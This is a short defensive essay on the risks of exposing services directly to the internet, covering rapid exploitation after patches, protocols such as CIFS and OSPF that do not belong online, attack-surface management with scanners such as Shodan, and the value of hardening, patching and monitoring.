Internet

The internet is an unforgiving place, where vulnerable servers are located and exploited quickly. Besides the normal bots that scan the internet for weak configs, others locate specific services and has a list of exploits for certain versions.

Also, when a new exploit becomes known, e.g. when the vendor issues a public patch, this patch is reverse engineered and converted to an exploit. So you should have a patch cycle that is quicker, or have some system that detects and block specific exploits, until you have time to patch your systems. It is common to have signature of exploits, before an actual patch is available.

Some attackers are organizations, some are script kiddies, some are targeting you, some are targeting a regions or an industry or just some specific service. This is a mix that makes it impossible to prevent all of them, since law enforcement simply doesn't have the capacity (or focus) to handle it all, the legal frameworks are weak, or the attacker is in a country where the activity is legal or tolerated.

In conclusion, these attack will continue forever, and you as someone who exposes a service must secure your part of the internet. It should be mandatory for services directly on the internet to be hardened and patched at regular intervals.

In general, some protocol should never end up on the internet. CIFS (windows shares), OSPF (dynamic routing) and other protocol are simply not designed to be in such a hostile environment. They might be enclosed in some encrypted tunnel between two locations, but never in plain-text. This also precludes unencrypted tunnels.

Other protocol have been on the internet forever and have wellknown behavior and vulnerabilities. Protocols like HTTP. DNS and SMTP have their origin before everybody was online. They have been upgraded, and all have TLS counterparts.

There is also a fundamental difference in the mindset of the programmer of "internal" services and "external" services. If you know that this service is intended to be exposed on the internet, most programmers will include security in their design and add at least basic hardening. For some reason, this does not seem to be true for webapps, where even common exploits (like OWASP top ten) are readily built-in and the software vulnerable.

The concept used is "attack surface". As the CIS critical control say, you must know which devices you have and what software is running on them. It is common for especially large organizations to expose services to the internet that they are unaware of. Especially a merger situation, where two companies merge into one, we see a lot of services with out owner, that is forgotten. The widespread use of cloud infrastructure makes this even more pronounced.

There are scanners on the internet that may help you with enumerating you attack surface. Shodan is one. Security trail's ISA is another example.

In summary, if you must put something directly on the internet, use services that are designed for it. Harden and monitor the server and maybe collect all the traffic going in and out, so you have something to analyze when things go wrong.